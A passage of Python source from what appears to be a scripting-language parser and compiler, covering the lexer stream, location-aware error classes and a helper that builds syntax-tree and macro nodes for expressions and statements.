SetMinus\n\nfrom doit.text.pgen.readers.glap.bootstrap.pp.commands import \\\n DefRule, DefGrammar\n\nie_ = lambda msg: \"%s (%s; %s)\" % (\n msg,\n \"internal error\",\n \"if you see this text, the command compiler is probably buggy\"\n)\nmn_ = lambda ncls, ctx, loc, *args: (\n ncls(*args).set_location(*make_location(ctx, loc))\n)\n\ndef make_location(context, loc = -1):\n \"\"\"\n \"\"\"\n\n stream = context.stream\n if loc < 0:\n loc = stream.pos\n s = stream.data[0 : loc]\n lineno = s.count('\\n') + 1\n if lineno > 1:\n s = s.split('\\n')[-1]\n colno = len(s) + 1\n return stream.name, lineno, colno\n#-def\n\nclass SetLocation(Functor):\n \"\"\"\n \"\"\"\n __slots__ = []\n\n def __init__(self, file, lineno, colno):\n \"\"\"\n \"\"\"\n\n Functor.__init__(self, file, lineno, colno)\n #-def\n\n def __call__(self, node):\n \"\"\"\n \"\"\"\n\n node.set_location(*self.args)\n #-def\n#-class\n\nclass GlapLexError(ParsingError):\n \"\"\"\n \"\"\"\n __slots__ = []\n\n def __init__(self, context, detail, loc = -1):\n \"\"\"\n \"\"\"\n\n name, lineno, colno = make_location(context, loc)\n ParsingError.__init__(self, \"In <%s> at [%d:%d]: %s\" % (\n name, lineno, colno, detail\n ))\n #-def\n#-class\n\nclass GlapSyntaxError(ParsingError):\n \"\"\"\n \"\"\"\n __slots__ = []\n\n def __init__(self, context, detail, loc = -1):\n \"\"\"\n \"\"\"\n\n p = context.lexer.token.position() if context.lexer.token else -1\n name, lineno, colno = make_location(context, p if loc < 0 else loc)\n ParsingError.__init__(self, \"In <%s> at [%d:%d]: %s\" % (\n name, lineno, colno, detail\n ))\n #-def\n#-class\n\nclass GlapContext(object):\n \"\"\"\n \"\"\"\n __slots__ = [ 'stream', 'lexer', 'parser', 'actions', 'env', 'processor' ]\n\n def __init__(self):\n \"\"\"\n \"\"\"\n\n self.stream = None\n self.lexer = None\n self.parser = None\n self.actions = None\n self.env = None\n self.processor = None\n #-def\n#-class\n\nclass GlapStream(object):\n \"\"\"\n \"\"\"\n __slots__ = [ 'context', 'name', 'data', 'pos', 'size' ]\n\n def __init__(self, context, name, s):\n \"\"\"\n \"\"\"\n\n context.stream = self\n self.context = context\n self.name = name\n self.data = s\n self.pos = 0\n self.size = len(s)\n #-def\n\n def peek(self, n):\n \"\"\"\n \"\"\"\n\n return self.data[self.pos : self.pos + n]\n #-def\n\n def next(self, n = 1):\n \"\"\"\n \"\"\"\n\n self.pos += n\n #-def\n\n def match(self, p):\n \"\"\"\n \"\"\"\n\n if self.peek(len(p)) != p:\n raise GlapLexError(self.context, \"Expected %r\" % p)\n self.pos += len(p)\n return p\n #-def\n\n def matchset(self, set):\n \"\"\"\n \"\"\"\n\n if self.pos < self.size and self.data[self.pos] in set:\n self.pos += 1\n return self.data[self.pos - 1]\n raise GlapLexError(self.context,\n \"Expected one of [%s]\" % repr(set)[1:-1]\n )\n #-def\n\n def matchif(self, f, fname):\n \"\"\"\n \"\"\"\n\n if self.pos < self.size and f(self.data[self.pos]):\n self.pos += 1\n return self.data[self.pos - 1]\n raise GlapLexError(self.context, \"Expected %s\" % fname)\n #-def\n\n def matchmany(self, set):\n \"\"\"\n \"\"\"\n\n p = self.pos\n while self.pos < self.size and self.data[self.pos] in set:\n self.pos += 1\n return self.data[p : self.pos]\n #-def\n\n def matchmanyif(self, f):\n \"\"\"\n \"\"\"\n\n p = self.pos\n while self.pos < self.size and f(self.data[self.pos]):\n self.pos += 1\n return self.data[p : self.pos]\n #-def\n\n def matchplus(self, set):\n \"\"\"\n \"\"\"\n\n m = self.matchset(set)\n return \"%s%s\" % (m, self.matchmany(set))\n #-def\n\n def matchplusif(self, f, fname):\n \"\"\"\n \"\"\"\n\n m = self.matchif(f, fname)\n return \"%s%s\" % (m, self.matchmanyif(f))\n #-def\n\n def matchopt(self, set, default):\n \"\"\"\n \"\"\"\n\n if self.pos < self.size and self.data[self.pos] in set:\n self.pos += 1\n return self.data[self.pos - 1]\n return default\n #-def\n\n def matchoptif(self, f, default):\n \"\"\"\n \"\"\"\n\n if self.pos < self.size and f(self.data[self.pos]):\n self.pos += 1\n return self.data[self.pos - 1]\n return default\n #-def\n\n def matchn(self, set, n):\n \"\"\"\n \"\"\"\n\n p = self.pos\n while n > 0 and self.pos < self.size and self.data[self.pos] in set:\n self.pos += 1\n n -= 1\n if n > 0:\n raise GlapLexError(self.context,\n \"Expected one of [%s]\" % repr(set)[1:-1]\n )\n return self.data[p : self.pos]\n #-def\n\n def matchnif(self, f, n, fname):\n \"\"\"\n \"\"\"\n\n p = self.pos\n while n > 0 and self.pos < self.size and f(self.data[self.pos]):\n self.pos += 1\n n -= 1\n if n > 0:\n raise GlapLexError(self.context, \"Expected %s\" % fname)\n return self.data[p : self.pos]\n #-def\n#-class\n\nclass GlapCompileCmdHelper(object):\n \"\"\"\n \"\"\"\n UNSPECIFIED = -1\n NULLARY_EXPR = 0\n UNARY_EXPR = 1\n BINARY_EXPR = 2\n INDEX_EXPR = 3\n ACCESS_EXPR = 4\n ASSIGN_EXPR = 5\n NARY_EXPR = 6\n CALL_EXPR = 7\n LAMBDA_EXPR = 8\n EXPAND = 9\n VARIABLE = 10\n STATEMENT = 11\n DEFMACRO_STATEMENT = 12\n DEFINE_STATEMENT = 13\n MACRO_NODE_NULLARY = 14\n MACRO_NODE_UNARY = 15\n MACRO_NODE_BINARY = 16\n MACRO_NODE_INDEX = 17\n MACRO_NODE_ACCESS = 18\n MACRO_NODE_ASSIGN = 19\n MACRO_NODE_NARY = 20\n MACRO_NODE_CALL = 21\n MACRO_NODE_LAMBDA = 22\n MACRO_EXPAND = 23\n MACRO_VARIABLE = 24\n MACRO_PARAM = 25\n MACRO_STATEMENT = 26\n __slots__ = [\n 'kind', 'node', 'code', 'vars', 'value_holder', 'context', 'location',\n 'errmsg'\n ]\n\n def __init__(self, context, location, errmsg):\n \"\"\"\n \"\"\"\n\n self.kind = self.UNSPECIFIED\n self.node = None\n self.code = []\n self.vars = []\n self.value_holder = None\n self.context = context\n self.location = location\n self.errmsg = errmsg\n #-def\n\n def remove_duplicated_vars(self):\n \"\"\"\n \"\"\"\n\n vars = []\n for v in self.vars:\n if v not in vars:\n vars.append(v)\n self.vars = vars\n #-def\n\n def value_expr(self):\n \"\"\"\n \"\"\"\n\n if self.value_holder is None:\n raise GlapSyntaxError(self.context, self.errmsg, self.location)\n return self.value_holder\n #-def\n\n @classmethod\n def checknode(cls, context, loc, node):\n \"\"\"\n \"\"\"\n\n errmsg = \"\"\n inmacro = context.actions.inmacro\n if node.kind >= cls.MACRO_NODE_NULLARY and not inmacro:\n errmsg = \"Macro node was detected outside macro definition\"\n if node.kind < cls.MACRO_NODE_NULLARY and inmacro:\n errmsg = \"Non-macro node was detected inside macro definition\"\n if errmsg != \"\":\n raise GlapSyntaxError(context, ie_(errmsg), loc)\n #-def\n\n @classmethod\n def make_unary(cls, context, loc, expr, unop):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, expr)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_UNARY\n o.node = MacroNode(unop, expr.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.UNARY_EXPR\n o.node = unop(expr.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(expr.code)\n o.vars.extend(expr.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_binary(cls, context, loc, lhs, rhs, binop):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, lhs)\n cls.checknode(context, loc, rhs)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_BINARY\n o.node = MacroNode(binop, lhs.value_expr(), rhs.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.BINARY_EXPR\n o.node = binop(lhs.value_expr(), rhs.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(lhs.code)\n o.code.extend(rhs.code)\n o.vars.extend(lhs.vars)\n o.vars.extend(rhs.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_index(cls, context, loc, expr, idx):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, expr)\n cls.checknode(context, loc, idx)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_INDEX\n o.node = MacroNode(GetItem, expr.value_expr(), idx.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.INDEX_EXPR\n o.node = GetItem(expr.value_expr(), idx.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(expr.code)\n o.code.extend(idx.code)\n o.vars.extend(expr.vars)\n o.vars.extend(idx.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_access(cls, context, loc, module, member):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, module)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_ACCESS\n o.node = MacroNode(\n GetMember, module.value_expr(), MacroNodeAtom(member.value())\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.ACCESS_EXPR\n o.node = GetMember(module.value_expr(), member.value())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(module.code)\n o.vars.extend(module.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_assign(cls, context, loc, lhs, rhs, inplaceop = None):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, lhs)\n cls.checknode(context, loc, rhs)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_ASSIGN\n else:\n o.kind = cls.ASSIGN_EXPR\n if lhs.kind in (cls.VARIABLE, cls.MACRO_VARIABLE):\n if inplaceop:\n if inmacro:\n a = MacroNode(GetLocal, MacroNodeAtom(lhs.node.value()))\n a.deferred.append(SetLocation(*make_location(\n context, lhs.node.position()\n )))\n ve = MacroNode(inplaceop, a, rhs.value_expr())\n ve.deferred.append(SetLocation(*make_location(\n context, loc\n )))\n o.node = MacroNode(\n SetLocal, MacroNodeAtom(lhs.node.value()), ve\n )\n else:\n a = GetLocal(lhs.node.value())\n a.set_location(*make_location(\n context, lhs.node.position()\n ))\n ve = inplaceop(a, rhs.value_expr())\n ve.set_location(*make_location(context, loc))\n o.node = SetLocal(lhs.node.value(), ve)\n else:\n if inmacro:\n o.node = MacroNode(\n SetLocal,\n MacroNodeAtom(lhs.node.value()),\n rhs.value_expr()\n )\n else:\n o.node = SetLocal(lhs.node.value(), rhs.value_expr())\n elif lhs.kind in (cls.INDEX_EXPR, cls.MACRO_NODE_INDEX):\n if inplaceop:\n if inmacro:\n ve = MacroNode(inplaceop, lhs.node, rhs.value_expr())\n ve.deferred.append(SetLocation(*make_location(\n context, loc\n )))\n o.node = MacroNode(\n SetItem, lhs.node.nodes[0], lhs.node.nodes[1], ve\n )\n else:\n ve = inplaceop(lhs.node, rhs.value_expr())\n ve.set_location(*make_location(context, loc))\n o.node = SetItem(\n lhs.node.operands[0], lhs.node.operands[1], ve\n )\n else:\n if inmacro:\n o.node = MacroNode(\n SetItem,\n lhs.node.nodes[0],\n lhs.node.nodes[1],\n rhs.value_expr()\n )\n else:\n o.node = SetItem(\n lhs.node.operands[0],\n lhs.node.operands[1],\n rhs.value_expr()\n )\n elif lhs.kind in (cls.ACCESS_EXPR, cls.MACRO_NODE_ACCESS):\n if inplaceop:\n if inmacro:\n ve = MacroNode(inplaceop, lhs.node, rhs.value_expr())\n ve.deferred.append(SetLocation(*make_location(\n context, loc\n )))\n o.node = MacroNode(\n SetMember, lhs.node.nodes[0], lhs.node.nodes[1], ve\n )\n else:\n ve = inplaceop(lhs.node, rhs.value_expr())\n ve.set_location(*make_location(context, loc))\n o.node = SetMember(lhs.node.module, lhs.node.member, ve)\n else:\n if inmacro:\n o.node = MacroNode(\n SetMember,\n lhs.node.nodes[0],\n lhs.node.nodes[1],\n rhs.value_expr()\n )\n else:\n o.node = SetMember(\n lhs.node.module, lhs.node.member, rhs.value_expr()\n )\n else:\n raise GlapSyntaxError(context,\n \"Left-hand side of assignment must be l-value\", loc\n )\n if inmacro:\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.node.set_location(*make_location(context, loc))\n o.code.extend(lhs.code)\n o.code.extend(rhs.code)\n o.code.append(o.node)\n o.vars.extend(rhs.vars)\n if lhs.kind in (cls.VARIABLE, cls.MACRO_VARIABLE):\n o.vars.insert(0, lhs.node.value())\n if inmacro:\n o.value_holder = MacroNode(\n GetLocal, MacroNodeAtom(lhs.node.value())\n )\n o.value_holder.deferred.append(SetLocation(*make_location(\n context, lhs.node.position()\n )))\n else:\n o.value_holder = GetLocal(lhs.node.value())\n o.value_holder.set_location(\n *make_location(context, lhs.node.position())\n )\n else:\n o.value_holder = lhs.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_call(cls, context, loc, f, fargs):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, f)\n for x in fargs:\n cls.checknode(context, loc, x)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_CALL\n o.node = MacroNode(\n Call, f.value_expr(), *[x.value_expr() for x in fargs]\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.CALL_EXPR\n o.node = Call(f.value_expr(), *[x.value_expr() for x in fargs])\n o.node.set_location(*make_location(context, loc))\n o.code.extend(f.code)\n o.vars.extend(f.vars)\n for x in fargs:\n o.code.extend(x.code)\n o.vars.extend(x.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_variable(cls, context, var):\n \"\"\"\n \"\"\"\n\n o = cls(context, var.position(), \"\")\n o.node = var\n if context.actions.inmacro:\n o.kind = cls.MACRO_VARIABLE\n o.value_holder = MacroNode(GetLocal, MacroNodeAtom(var.value()))\n o.value_holder.deferred.append(\n SetLocation(*make_location(context, var.position()))\n )\n else:\n o.kind = cls.VARIABLE\n o.value_holder = GetLocal(var.value())\n o.value_holder.set_location(\n *make_location(context, var.position())\n )\n return o\n #-def\n\n @classmethod\n def make_getvalue(cls, context, var):\n \"\"\"\n \"\"\"\n\n o = cls(context, var.position(), \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_NODE_NULLARY\n o.node = MacroNode(GetLocal, MacroNodeAtom(var.value()))\n o.node.deferred.append(SetLocation(*make_location(\n context, var.position()\n )))\n else:\n o.kind = cls.NULLARY_EXPR\n o.node = GetLocal(var.value())\n o.node.set_location(*make_location(context, var.position()))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_macroparam(cls, context, var):\n \"\"\"\n \"\"\"\n\n if not context.actions.inmacro:\n raise GlapSyntaxError(context,\n \"Macro parameter must be used only inside macro body\",\n var.position()\n )\n o = cls(context, var.position(), \"\")\n o.kind = cls.MACRO_PARAM\n o.node = MacroNodeParam(var.value())\n o.node.deferred.append(SetLocation(*make_location(\n context, var.position()\n )))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_expand(cls, context, loc, m, margs):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, m)\n for x in margs:\n cls.checknode(context, loc, x)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_EXPAND\n o.node = MacroNode(\n Expand, m.value_expr(), *[x.value_expr() for x in margs]\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.EXPAND\n o.node = Expand(m.value_expr(), *[x.value_expr() for x in margs])\n o.node.set_location(*make_location(context, loc))\n o.code.extend(m.code)\n o.vars.extend(m.vars)\n for x in margs:\n o.code.extend(x.code)\n o.vars.extend(x.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_literal(cls, context, t):\n \"\"\"\n \"\"\"\n\n o = cls(context, t.position(), \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_NODE_NULLARY\n o.node = MacroNode(Const, MacroNodeAtom(t.value(True)))\n o.node.deferred.append(SetLocation(*make_location(\n context, t.position()\n )))\n else:\n o.kind = cls.NULLARY_EXPR\n o.node = Const(t.value(True))\n o.node.set_location(*make_location(context, t.position()))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_pair(cls, context, loc, x, y):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, x)\n cls.checknode(context, loc, y)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_BINARY\n o.node = MacroNode(NewPair, x.value_expr(), y.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.BINARY_EXPR\n o.node = NewPair(x.value_expr(), y.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(x.code)\n o.code.extend(y.code)\n o.vars.extend(x.vars)\n o.vars.extend(y.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_list(cls, context, loc, items):\n \"\"\"\n \"\"\"\n\n for i in items:\n cls.checknode(context, loc, i)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_NARY\n o.node = MacroNode(NewList, *[i.value_expr() for i in items])\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.NARY_EXPR\n o.node = NewList(*[i.value_expr() for i in items])\n o.node.set_location(*make_location(context, loc))\n for i in items:\n o.code.extend(i.code)\n o.vars.extend(i.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_hash(cls, context, loc, items):\n \"\"\"\n \"\"\"\n\n for k, v in items:\n cls.checknode(context, loc, k)\n cls.checknode(context, loc, v)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_NARY\n items_ = []\n for k, v in items:\n p = MacroNode(NewPair, k.value_expr(), v.value_expr())\n p.deferred.append(k.value_expr().deferred[0])\n items_.append(p)\n o.node = MacroNode(NewHashMap, *items_)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.NARY_EXPR\n o.node = NewHashMap(*[\n (k.value_expr(), v.value_expr()) for k, v in items\n ])\n o.node.set_location(*make_location(context, loc))\n for k, v in items:\n o.code.extend(k.code)\n o.code.extend(v.code)\n o.vars.extend(k.vars)\n o.vars.extend(v.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_lambda(cls, context, loc, fargs, has_varargs, commands):\n \"\"\"\n \"\"\"\n\n if context.actions.procedure_nesting_level <= 0:\n raise GlapSyntaxError(context,\n ie_(\"Unballanced `define's\"), loc\n )\n for cmd in commands:\n cls.checknode(context, loc, cmd)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n body = []\n bvars = []\n for cmd in commands:\n body.extend(cmd.code)\n if cmd.kind not in (cls.ASSIGN_EXPR, cls.MACRO_NODE_ASSIGN):\n body.append(cmd.value_expr())\n bvars.extend(cmd.vars)\n fargs_ = [x.value() for x in fargs]\n bvars_ = [x for x in bvars if x not in fargs_]\n if inmacro:\n o.kind = cls.MACRO_NODE_LAMBDA\n o.node = MacroNode(\n Lambda,\n MacroNodeAtom(fargs_),\n MacroNodeAtom(has_varargs),\n MacroNodeSequence(*body),\n MacroNodeAtom(bvars_)\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.LAMBDA_EXPR\n o.node = Lambda(fargs_, has_varargs, body, bvars_)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n context.actions.procedure_nesting_level -= 1\n return o\n #-def\n\n @classmethod\n def make_block(cls, context, loc, commands, keep_varinfo = False):\n \"\"\"\n \"\"\"\n\n for cmd in commands:\n cls.checknode(context, loc, cmd)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n body = []\n for cmd in commands:\n body.extend(cmd.code)\n if keep_varinfo:\n o.vars.extend(cmd.vars)\n if cmd.kind not in (cls.ASSIGN_EXPR, cls.MACRO_NODE_ASSIGN):\n body.append(cmd.value_expr())\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Block, *body)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Block(*body)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_defmacro(cls, context, loc, name, params, body):\n \"\"\"\n \"\"\"\n\n if not context.actions.inmacro:\n raise GlapSyntaxError(context,\n ie_(\"Macro body is outside `defmacro'\"), loc\n )\n if context.actions.procedure_nesting_level != 0:\n raise GlapSyntaxError(context,\n ie_(\"Macro body is inside function\"), loc\n )\n for node in body:\n cls.checknode(context, loc, node)\n o = cls(context, loc, \"\")\n o.kind = cls.DEFMACRO_STATEMENT\n mbody = []\n for node in body:\n mbody.extend(node.code)\n if node.kind not in (cls.ASSIGN_EXPR, cls.MACRO_NODE_ASSIGN):\n mbody.append(node.value_expr())\n o.node = DefMacro(name.value(), [p.value() for p in params], mbody)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n context.actions.inmacro = False\n return o\n #-def\n\n @classmethod\n def make_define(cls, context, loc, name, params, has_varargs, body):\n \"\"\"\n \"\"\"\n\n if context.actions.inmacro:\n raise GlapSyntaxError(context,\n ie_(\"Function definition is inside macro\"), loc\n )\n if context.actions.procedure_nesting_level <= 0:\n raise GlapSyntaxError(context,\n ie_(\"Unballanced `define's\"), loc\n )\n cls.checknode(context, loc, body)\n params_ = [p.value() for p in params]\n bvars_ = [v for v in body.vars if v not in params_]\n body_ = body.value_expr().commands\n o = cls(context, loc, \"\")\n o.kind = cls.DEFINE_STATEMENT\n o.node = Define(name.value(), bvars_, params_, has_varargs, body_)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n context.actions.procedure_nesting_level -= 1\n return o\n #-def\n\n @classmethod\n def make_if(cls, context, loc, cond, then_part, elif_parts, else_part):\n \"\"\"\n \"\"\"\n\n inmacro = context.actions.inmacro\n if_then_parts = [(loc, cond, then_part)]\n if_then_parts.extend(elif_parts)\n node = None\n vars = []\n while if_then_parts:\n l, c, t = if_then_parts.pop()\n if node is None:\n node = []\n if else_part:\n ll, else_node = else_part[0]\n cls.checknode(context, ll, else_node)\n if inmacro:\n node.extend(else_node.value_expr().nodes)\n else:\n node.extend(else_node.value_expr().commands)\n vars.extend(else_node.vars)\n # `node' is either [] or [commands] or [macro nodes]\n cls.checknode(context, l, c)\n cls.checknode(context, l, t)\n if inmacro:\n node = c.code + [MacroNode(\n If,\n c.value_expr(),\n MacroNodeSequence(*t.value_expr().nodes),\n MacroNodeSequence(*node)\n )]\n node[-1].deferred.append(SetLocation(*make_location(\n context, l\n )))\n else:\n node = c.code + [If(\n c.value_expr(),\n t.value_expr().commands,\n node\n )]\n node[-1].set_location(*make_location(context, l))\n vars_ = []\n vars_.extend(c.vars)\n vars_.extend(t.vars)\n vars_.extend(vars)\n vars = vars_\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n else:\n o.kind = cls.STATEMENT\n o.node = node[-1]\n o.code = node[:-1]\n o.vars = vars\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_foreach(cls, context, loc, var, ie, body):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, ie)\n cls.checknode(context, loc, body)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(\n Foreach,\n MacroNodeAtom(var.value()),\n ie.value_expr(),\n MacroNodeSequence(*body.value_expr().nodes)\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Foreach(\n var.value(), ie.value_expr(), body.value_expr().commands\n )\n o.node.set_location(*make_location(context, loc))\n o.code.extend(ie.code)\n o.vars.append(var.value())\n o.vars.extend(ie.vars)\n o.vars.extend(body.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_while(cls, context, loc, cond, body):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, cond)\n if cond.code:\n raise GlapSyntaxError(\n context,\n ie_(\"More then one commands in while-condition expression\"),\n loc\n )\n cls.checknode(context, loc, body)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(\n While,\n cond.value_expr(),\n MacroNodeSequence(*body.value_expr().nodes)\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = While(\n cond.value_expr(), body.value_expr().commands\n )\n o.node.set_location(*make_location(context, loc))\n o.vars.extend(cond.vars)\n o.vars.extend(body.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_dowhile(cls, context, loc, body, cond):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, body)\n cls.checknode(context, loc, cond)\n if cond.code:\n raise GlapSyntaxError(\n context,\n ie_(\"More then one commands in while-condition expression\"),\n loc\n )\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(\n DoWhile,\n MacroNodeSequence(*body.value_expr().nodes),\n cond.value_expr()\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = DoWhile(\n body.value_expr().commands, cond.value_expr()\n )\n o.node.set_location(*make_location(context, loc))\n o.vars.extend(body.vars)\n o.vars.extend(cond.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_break(cls, context, loc):\n \"\"\"\n \"\"\"\n\n o = cls(context, loc, \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Break)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Break()\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_continue(cls, context, loc):\n \"\"\"\n \"\"\"\n\n o = cls(context, loc, \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Continue)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Continue()\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_return(cls, context, loc):\n \"\"\"\n \"\"\"\n\n o = cls(context, loc, \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Return)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Return()\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_return_with_value(cls, context, loc, rv):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, rv)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Return, rv.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Return(rv.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(rv.code)\n o.vars.extend(rv.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_try(cls, context, loc, tryblock, catches, fnly):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, tryblock)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n b = tryblock.value_expr().nodes\n o.vars.extend(tryblock.vars)\n c = []\n for ll, ee, ev, hh in catches:\n cls.checknode(context, ll, hh)\n if ev:\n ev = ev.value()\n o.vars.append(ev)\n c.append(MacroNodeSequence(\n MacroNodeAtom(ee.value()),\n MacroNodeAtom(ev),\n MacroNodeSequence(*hh.value_expr().nodes)\n ))\n o.vars.extend(hh.vars)\n f = []\n if fnly:\n ll, ff = fnly[0]\n cls.checknode(context, ll, ff)\n f.extend(ff.value_expr().nodes)\n o.vars.extend(ff.vars)\n o.node = MacroNode(\n TryCatchFinally,\n MacroNodeSequence(*b),\n MacroNodeSequence(*c),\n MacroNodeSequence(*f)\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n b = tryblock.value_expr().commands\n o.vars.extend(tryblock.vars)\n c = []\n for ll, ee, ev, hh in catches:\n cls.checknode(context, ll, hh)\n if ev:\n ev = ev.value()\n o.vars.append(ev)\n c.append((ee.value(), ev, hh.value_expr().commands))\n o.vars.extend(hh.vars)\n f = []\n if fnly:\n ll, ff = fnly[0]\n cls.checknode(context, ll, ff)\n f.extend(ff.value_expr().commands)\n 